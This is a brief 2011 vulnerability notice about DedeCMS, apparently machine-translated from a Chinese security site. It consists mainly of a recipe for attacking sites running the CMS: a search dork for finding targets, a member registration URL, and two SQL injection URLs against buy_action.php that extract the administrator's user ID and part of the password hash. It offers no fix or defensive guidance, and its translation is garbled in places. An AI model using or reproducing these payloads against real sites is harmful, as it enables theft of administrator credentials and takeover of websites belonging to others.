DedeCMS. Weaving a dream technology injection squib administrator user password vulnerability-vulnerability warning-the black bar safety net

2011-03-26T00:00:00
ID MYHACK58:62201129866
Type myhack58
Reporter 佚名
Modified 2011-03-26T00:00:00

Description

Search keyword:powered by dedecms

The first registered user,the registered address: /member/index_do. php? fmdo=user&dopost=regnew

Burst pipe processing account: /member/buy_action. php? product=member&pid=1%20and%2 0 1=1 1%20union%20select%201,2,userid,4,5%20from%2 0% 2 3@__admin/*

Squib administrator password /member/buy_action. php? product=member&pid=1%20and%2 0 1=1 1%20union%20select%201,2,substring(pwd,9,1 6),4,5%20from%2 0% 2 3@__admin/*